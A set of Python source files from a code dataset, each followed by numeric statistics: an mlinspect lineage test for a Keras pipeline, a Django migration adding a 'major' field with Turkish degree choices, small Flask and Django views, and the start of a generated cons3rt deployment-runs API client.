inspections=[RowLineage(3)])
expected_dag = networkx.DiGraph()
expected_data_source = DagNode(0,
BasicCodeLocation("<string-source>", 9),
OperatorContext(OperatorType.DATA_SOURCE,
FunctionInfo('pandas.core.frame', 'DataFrame')),
DagNodeDetails(None, ['A', 'B', 'target']),
OptionalCodeInfo(CodeReference(9, 5, 9, 95),
"pd.DataFrame({'A': [0, 1, 2, 3], 'B': [0, 1, 2, 3], "
"'target': ['no', 'no', 'yes', 'yes']})"))
expected_standard_scaler = DagNode(2,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._data', 'StandardScaler')),
DagNodeDetails('Standard Scaler', ['array']),
OptionalCodeInfo(CodeReference(11, 8, 11, 24), 'StandardScaler()'))
expected_data_projection = DagNode(1,
BasicCodeLocation("<string-source>", 11),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['A', 'B']", ['A', 'B']),
OptionalCodeInfo(CodeReference(11, 39, 11, 53), "df[['A', 'B']]"))
expected_dag.add_edge(expected_data_source, expected_data_projection)
expected_dag.add_edge(expected_data_projection, expected_standard_scaler)
expected_label_projection = DagNode(3,
BasicCodeLocation("<string-source>", 12),
OperatorContext(OperatorType.PROJECTION,
FunctionInfo('pandas.core.frame', '__getitem__')),
DagNodeDetails("to ['target']", ['target']),
OptionalCodeInfo(CodeReference(12, 51, 12, 65), "df[['target']]"))
expected_dag.add_edge(expected_data_source, expected_label_projection)
expected_label_encode = DagNode(4,
BasicCodeLocation("<string-source>", 12),
OperatorContext(OperatorType.TRANSFORMER,
FunctionInfo('sklearn.preprocessing._encoders', 'OneHotEncoder')),
DagNodeDetails('One-Hot Encoder', ['array']),
OptionalCodeInfo(CodeReference(12, 9, 12, 36), 'OneHotEncoder(sparse=False)'))
expected_dag.add_edge(expected_label_projection, expected_label_encode)
expected_train_data = DagNode(5,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.TRAIN_DATA,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Train Data', ['array']),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_standard_scaler, expected_train_data)
expected_train_labels = DagNode(6,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.TRAIN_LABELS,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Train Labels', ['array']),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_label_encode, expected_train_labels)
expected_classifier = DagNode(7,
BasicCodeLocation("<string-source>", 22),
OperatorContext(OperatorType.ESTIMATOR,
FunctionInfo('tensorflow.python.keras.wrappers.scikit_learn',
'KerasClassifier')),
DagNodeDetails('Neural Network', []),
OptionalCodeInfo(CodeReference(22, 6, 22, 92),
'KerasClassifier(build_fn=create_model, epochs=2, '
'batch_size=1, verbose=0, input_dim=2)'))
expected_dag.add_edge(expected_train_data, expected_classifier)
expected_dag.add_edge(expected_train_labels, expected_classifier)
compare(networkx.to_dict_of_dicts(inspector_result.dag), networkx.to_dict_of_dicts(expected_dag))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_data]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[numpy.array([-1.3416407864998738, -1.3416407864998738]), {LineageId(0, 0)}],
[numpy.array([-0.4472135954999579, -0.4472135954999579]), {LineageId(0, 1)}],
[numpy.array([0.4472135954999579, 0.4472135954999579]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_train_labels]
lineage_output = inspection_results_data_source[RowLineage(3)]
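    # Editorial note: OneHotEncoder sorts the target categories as ['no', 'yes'],
    # so 'no' encodes to [1., 0.] and 'yes' to [0., 1.] in the rows below.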
expected_lineage_df = DataFrame([[numpy.array([1., 0.]), {LineageId(0, 0)}],
[numpy.array([1., 0.]), {LineageId(0, 1)}],
[numpy.array([0., 1.]), {LineageId(0, 2)}]],
columns=['array', 'mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True))
inspection_results_data_source = inspector_result.dag_node_to_inspection_results[expected_classifier]
lineage_output = inspection_results_data_source[RowLineage(3)]
expected_lineage_df = DataFrame([[{LineageId(0, 0)}],
[{LineageId(0, 1)}],
[{LineageId(0, 2)}]],
columns=['mlinspect_lineage'])
pandas.testing.assert_frame_equal(lineage_output.reset_index(drop=True), expected_lineage_df.reset_index(drop=True),
check_column_type=False)
| 67.088931 | 120 | 0.537222 | 6,292 | 70,913 | 5.790051 | 0.042435 | 0.006752 | 0.024594 | 0.031621 | 0.938569 | 0.92844 | 0.912437 | 0.896901 | 0.87022 | 0.859954 | 0 | 0.039345 | 0.350556 | 70,913 | 1,056 | 121 | 67.152462 | 0.751705 | 0.02276 | 0 | 0.814525 | 0 | 0.023464 | 0.240454 | 0.058536 | 0 | 0 | 0 | 0.002841 | 0.049162 | 1 | 0.014525 | false | 0 | 0.068156 | 0 | 0.083799 | 0.003352 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68b785c97b08e1f1f15e545249430ec69a0eded2 | 92 | py | Python | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | 2 | 2019-02-10T04:59:52.000Z | 2019-02-11T04:09:52.000Z | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | null | null | null | algorithms/unix/__init__.py | coderPreacher/algorithms | b3f6adec1441db09ad51d68fd1143044fbd85b3d | [
"MIT"
] | 2 | 2019-05-17T21:56:35.000Z | 2021-03-24T06:56:18.000Z | from .path.join_with_slash import *
from .path.full_path import *
from .path.split import *
| 23 | 35 | 0.771739 | 15 | 92 | 4.533333 | 0.533333 | 0.352941 | 0.411765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 92 | 3 | 36 | 30.666667 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68f873f2bf3c958e4267ded7737b6fd020f08ef5 | 7,828 | py | Python | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 220 | 2018-04-18T06:11:24.000Z | 2022-02-14T15:35:50.000Z | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 19 | 2018-04-20T18:48:32.000Z | 2022-03-11T23:43:31.000Z | Vecihi/Backend/vecihi/users/migrations/0006_user_major.py | developertqw2017/migrationDjango | f7256ec2af51da1179d2f957e1aa896191b7b514 | [
"MIT"
] | 43 | 2018-04-20T18:27:08.000Z | 2021-11-05T01:34:48.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-02-27 16:19
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20180224_1926'),
]
operations = [
migrations.AddField(
model_name='user',
name='major',
field=models.CharField(blank=True, choices=[(b'Akt\xc3\xbcerya', b'Akt\xc3\xbcerya'), (b'Alman Dili ve Edebiyat\xc4\xb1', b'Alman Dili ve Edebiyat\xc4\xb1'), (b'Almanca \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Almanca \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Bankac\xc4\xb1l\xc4\xb1k', b'Bankac\xc4\xb1l\xc4\xb1k'), (b'Beslenme ve Diyetetik', b'Beslenme ve Diyetetik'), (b'Bilgi ve Belge Y\xc3\x96netimi', b'Bilgi ve Belge Y\xc3\x96netimi'), (b'Bilgisayar M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Bilgisayar M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Bilgisayar ve \xc3\x96\xc4\x9fretim Teknolojileri \xc3\x96\xc4\x9fr.', b'Bilgisayar ve \xc3\x96\xc4\x9fretim Teknolojileri \xc3\x96\xc4\x9fr.'), (b'Biyoloji', b'Biyoloji'), (b'Biyoloji \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Biyoloji \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Biyom\xc3\xbchendislik (\xc4\xb0ngilizce)', b'Biyom\xc3\xbchendislik (\xc4\xb0ngilizce)'), (b'Co\xc4\x9frafya', b'Co\xc4\x9frafya'), (b'Co\xc4\x9frafya \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Co\xc4\x9frafya \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc3\x87al\xc4\xb1\xc5\x9fma Ekonomisi ve End\xc3\xbcstri \xc4\xb0li\xc5\x9fkileri', b'\xc3\x87al\xc4\xb1\xc5\x9fma Ekonomisi ve End\xc3\xbcstri \xc4\xb0li\xc5\x9fkileri'), (b'\xc3\x87evre M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'\xc3\x87evre M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Di\xc5\x9f Hekimli\xc4\x9fi (\xc4\xb0ngilizce)', b'Di\xc5\x9f Hekimli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Ebelik', b'Ebelik'), (b'Eczac\xc4\xb1l\xc4\xb1k', b'Eczac\xc4\xb1l\xc4\xb1k'), (b'Ekonometri', b'Ekonometri'), (b'Elektrik-Elektronik M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Elektrik-Elektronik M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'End\xc3\xbcstri M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'End\xc3\xbcstri M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'End\xc3\xbcstri \xc3\xbcr\xc3\xbcnleri Tasar\xc4\xb1m\xc4\xb1', b'End\xc3\xbcstri \xc3\xbcr\xc3\xbcnleri Tasar\xc4\xb1m\xc4\xb1'), (b'Fen Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Fen Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Fizik', b'Fizik'), (b'Fizik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Fizik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Fizyoterapi ve Rehabilitasyon', b'Fizyoterapi ve Rehabilitasyon'), (b'Foto\xc4\x9fraf', b'Foto\xc4\x9fraf'), (b'Frans\xc4\xb1zca \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Frans\xc4\xb1zca \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Gazetecilik', b'Gazetecilik'), (b'Geleneksek T\xc3\xbcrk Sanatlar\xc4\xb1', b'Geleneksek T\xc3\xbcrk Sanatlar\xc4\xb1'), (b'Grafik', b'Grafik'), (b'Halkla \xc4\xb0li\xc5\x9fkiler ve Tan\xc4\xb1t\xc4\xb1m', b'Halkla \xc4\xb0li\xc5\x9fkiler ve Tan\xc4\xb1t\xc4\xb1m'), (b'Hem\xc5\x9firelik', b'Hem\xc5\x9firelik'), (b'Heykel', b'Heykel'), (b'Hukuk', b'Hukuk'), (b'\xc4\xb0ktisat', b'\xc4\xb0ktisat'), (b'\xc4\xb0ktisat (\xc4\xb0ngilizce)', b'\xc4\xb0ktisat (\xc4\xb0ngilizce)'), (b'\xc4\xb0lahiyat (\xc4\xb0ngilizce)', b'\xc4\xb0lahiyat (\xc4\xb0ngilizce)'), (b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi (\xc4\xb0\xc3\x96)', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Din K\xc3\xbclt\xc3\xbcr\xc3\xbc ve Ahlak Bilgisi \xc3\x96\xc4\x9fretmenli\xc4\x9fi (\xc4\xb0\xc3\x96)'), 
(b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0lk\xc3\x96\xc4\x9fretim Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0ngilizce \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'\xc4\xb0ngilizce \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'\xc4\xb0\xc3\xa7mimarl\xc4\xb1k', b'\xc4\xb0\xc3\xa7mimarl\xc4\xb1k'), (b'\xc4\xb0\xc5\x9fletme', b'\xc4\xb0\xc5\x9fletme'), (b'\xc4\xb0\xc5\x9fletme (Almanca)', b'\xc4\xb0\xc5\x9fletme (Almanca)'), (b'\xc4\xb0\xc5\x9fletme (\xc4\xb0ngilizce)', b'\xc4\xb0\xc5\x9fletme (\xc4\xb0ngilizce)'), (b'\xc4\xb0\xc5\x9fletme Enformati\xc4\x9fi (Almanca)', b'\xc4\xb0\xc5\x9fletme Enformati\xc4\x9fi (Almanca)'), (b'\xc4\xb0\xc5\x9fletme Fak\xc3\xbcltesi', b'\xc4\xb0\xc5\x9fletme Fak\xc3\xbcltesi'), (b'Kamu Y\xc3\x96netimi (Frans\xc4\xb1zca)', b'Kamu Y\xc3\x96netimi (Frans\xc4\xb1zca)'), (b'Kimya', b'Kimya'), (b'Kimya M\xc3\xbchendisli\xc4\x9fi (%30 \xc4\xb0ngilizce)', b'Kimya M\xc3\xbchendisli\xc4\x9fi (%30 \xc4\xb0ngilizce)'), (b'Kimya \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Kimya \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Makine M\xc3\xbchendisli\xc4\x9fi', b'Makine M\xc3\xbchendisli\xc4\x9fi'), (b'Makine M\xc3\xbchendisli\xc4\x9fi (M.T.O.K.)', b'Makine M\xc3\xbchendisli\xc4\x9fi (M.T.O.K.)'), (b'Makine M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Makine M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'Maliye', b'Maliye'), (b'Matematik', b'Matematik'), (b'Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Matematik \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Mekatronik M\xc3\xbchendisli\xc4\x9fi', b'Mekatronik M\xc3\xbchendisli\xc4\x9fi'), (b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi', b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi'), (b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)', b'Metalurji ve Malzeme M\xc3\xbchendisli\xc4\x9fi (\xc4\xb0ngilizce)'), (b'M\xc3\xbczik', b'M\xc3\xbczik'), (b'Okul \xc3\x96ncesi \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Okul \xc3\x96ncesi \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Radyo, Televizyon ve Sinema', b'Radyo, Televizyon ve Sinema'), (b'Rehberlik ve Psikolojik Dan\xc4\xb1\xc5\x9fmanl\xc4\xb1k', b'Rehberlik ve Psikolojik Dan\xc4\xb1\xc5\x9fmanl\xc4\xb1k'), (b'Resim', b'Resim'), (b'Sanat Tarihi', b'Sanat Tarihi'), (b'Sa\xc4\x9fl\xc4\xb1k Y\xc3\x96netimi', b'Sa\xc4\x9fl\xc4\xb1k Y\xc3\x96netimi'), (b'Seramik Cam', b'Seramik Cam'), (b'Sermaye Piyasas\xc4\xb1', b'Sermaye Piyasas\xc4\xb1'), (b'Sigortac\xc4\xb1l\xc4\xb1k', b'Sigortac\xc4\xb1l\xc4\xb1k'), (b'Sinema ve Televizyon', b'Sinema ve Televizyon'), (b'Siyaset Bilimi ve Uluslararas\xc4\xb1 \xc4\xb0li\xc5\x9fkiler (\xc4\xb0ngilizce)', b'Siyaset Bilimi ve Uluslararas\xc4\xb1 \xc4\xb0li\xc5\x9fkiler (\xc4\xb0ngilizce)'), (b'Sosyal Bilgiler \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Sosyal Bilgiler \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Sosyoloji (\xc4\xb0ngilizce)', b'Sosyoloji (\xc4\xb0ngilizce)'), (b'Spor Y\xc3\x96neticili\xc4\x9fi', b'Spor Y\xc3\x96neticili\xc4\x9fi'), (b'S\xc4\xb1n\xc4\xb1f \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'S\xc4\xb1n\xc4\xb1f \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Tak\xc4\xb1 Tasar\xc4\xb1m\xc4\xb1', b'Tak\xc4\xb1 Tasar\xc4\xb1m\xc4\xb1'), (b'Tarih', b'Tarih'), (b'Tarih \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Tarih \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'Tekstil', b'Tekstil'), (b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1', b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1'), (b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1 \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'T\xc3\xbcrk Dili ve Edebiyat\xc4\xb1 \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'T\xc3\xbcrk\xc3\xa7e \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'T\xc3\xbcrk\xc3\xa7e \xc3\x96\xc4\x9fretmenli\xc4\x9fi'), (b'T\xc4\xb1p (\xc4\xb0ngilizce)', b'T\xc4\xb1p (\xc4\xb0ngilizce)'), (b'Zihin Engelliler \xc3\x96\xc4\x9fretmenli\xc4\x9fi', b'Zihin Engelliler \xc3\x96\xc4\x9fretmenli\xc4\x9fi')], max_length=1, null=True),
),
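        # Editorial note: max_length=1 looks inconsistent with these choice
        # values, which are far longer than one character; the migration applies,
        # but saving any of these choices could truncate or fail depending on
        # the database backend.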
]
| 372.761905 | 7,434 | 0.722024 | 1,331 | 7,828 | 4.238918 | 0.138993 | 0.081886 | 0.076569 | 0.134704 | 0.906416 | 0.855548 | 0.835165 | 0.785005 | 0.752393 | 0.622297 | 0 | 0.114435 | 0.068983 | 7,828 | 20 | 7,435 | 391.4 | 0.659715 | 0.008687 | 0 | 0 | 1 | 1.384615 | 0.819518 | 0.404409 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
6bf242241d374474ec99a7b7e727b86abf2bccd3 | 96 | py | Python | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | app/aicos_monitor/views.py | muhiza/digital.cooperative | f57a749e10796b6e00920b21809ab56b9274d944 | [
"Unlicense"
] | null | null | null | from . import aicos_monitor
@aicos_monitor.route('/')
def home():
return "Hello Monitor here!" | 19.2 | 29 | 0.729167 | 13 | 96 | 5.230769 | 0.769231 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 96 | 5 | 29 | 19.2 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d485d30626e513b2c57a7fd0fae47a06817e2d94 | 119 | py | Python | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | 7 | 2020-02-12T02:58:52.000Z | 2022-02-10T08:52:44.000Z | selia_about/views/about_irekua.py | CONABIO-audio/selia-about | e1b4e9271fdc0d5c32ed1cbfaa69a337159e118a | [
"BSD-4-Clause"
] | null | null | null | from django.shortcuts import render
def about_irekua(request):
return render(request, 'selia_about/irekua.html')
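# A matching URLconf entry might look like this (editorial sketch; the URL
# pattern and route name are assumptions, not taken from the project):
#
#     from django.urls import path
#     urlpatterns = [path('about/irekua/', about_irekua, name='about-irekua')]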
| 19.833333 | 53 | 0.781513 | 16 | 119 | 5.6875 | 0.75 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12605 | 119 | 5 | 54 | 23.8 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0.193277 | 0.193277 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
00fa435090399be7db475a50ddde98a9167cb613 | 166,203 | py | Python | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | cons3rt/api/deployment_runs_api.py | cons3rt/cons3rt-python-sdk | f0bcb295735ac55bbe47448fcbd95d2c7beb3ec0 | [
"RSA-MD"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
"""
Copyright 2020 Jackpine Technologies Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
cons3rt - Copyright Jackpine Technologies Corp.
NOTE: This file is auto-generated. Do not edit the file manually.
"""
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from cons3rt.api_client import ApiClient
from cons3rt.exceptions import (
ApiTypeError,
ApiValueError
)
__author__ = 'Jackpine Technologies Corporation'
__copyright__ = 'Copyright 2020, Jackpine Technologies Corporation'
__license__ = 'Apache 2.0'
__version__ = '1.0.0'
__maintainer__ = 'API Support'
__email__ = 'support@cons3rt.com'
class DeploymentRunsApi(object):
"""NOTE: This class is auto-generated. Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
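    # Example usage (editorial sketch; the category and run IDs are placeholders):
    #
    #     api = DeploymentRunsApi(ApiClient())
    #     ok = api.add_category_to_deployment_run('10', runid='12345')
    #     # or asynchronously, as documented in each method's docstring:
    #     thread = api.add_category_to_deployment_run('10', runid='12345', async_req=True)
    #     ok = thread.get()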
def add_category_to_deployment_run(self, id, runid, **kwargs): # noqa: E501
"""Assign Category to Run # noqa: E501
Assigns the Category as a filter tag to the provided Deployment Run.<br> <br> Altering the Category will affect future Run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_category_to_deployment_run(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to assign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.add_category_to_deployment_run_with_http_info(id, runid, **kwargs) # noqa: E501
def add_category_to_deployment_run_with_http_info(self, id, runid, **kwargs): # noqa: E501
"""Assign Category to Run # noqa: E501
Assigns the Category as a filter tag to the provided Deployment Run.<br> <br> Altering the Category will affect future Run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_category_to_deployment_run_with_http_info(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to assign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'runid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method add_category_to_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `add_category_to_deployment_run`") # noqa: E501
# verify the required parameter 'runid' is set
if self.api_client.client_side_validation and ('runid' not in local_var_params or # noqa: E501
local_var_params['runid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `runid` when calling `add_category_to_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'runid' in local_var_params and local_var_params['runid'] is not None: # noqa: E501
query_params.append(('runid', local_var_params['runid'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/categories/{id}/run', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
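    # Note (editorial): every public method in this generated client is a thin
    # wrapper that sets _return_http_data_only=True and delegates to its
    # *_with_http_info twin, which returns a (data, status_code, headers) tuple
    # instead of just the response data.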
def create_identity(self, id, hostid, cloud_resource_object, **kwargs): # noqa: E501
"""Create a host identity # noqa: E501
Creates an identity for the deployment run host with access to the resources requested by the user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_identity(id, hostid, cloud_resource_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
